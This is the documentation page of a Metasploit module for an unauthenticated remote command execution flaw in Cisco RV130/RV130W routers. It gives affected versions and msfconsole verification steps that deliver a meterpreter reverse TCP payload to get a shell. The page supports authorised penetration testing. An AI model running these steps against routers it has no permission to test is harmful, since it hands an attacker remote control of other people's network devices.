adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
T
Quentin Kaiser ddb21a9061 Fix numbering.
2019-03-24 17:52:11 +01:00

1.2 KiB
Raw Blame History

Cisco RV130W Routers Management Interface Remote Command Execution

A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.

The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.

A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user.

Vulnerable Device

  • RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
  • RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.

This exploit was specifically written against version 1.0.3.28. To test, you can find the firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28

Verification Steps

  1. Start msfconsole
  2. use exploit/linux/http/cisco_rv130_rmi_rce
  3. set rhost [IP]
  4. set payload linux/armle/meterpreter_reverse_tcp
  5. set lhost [IP]
  6. exploit
  7. You should get a session
Reference in New Issue View Git Blame Copy Permalink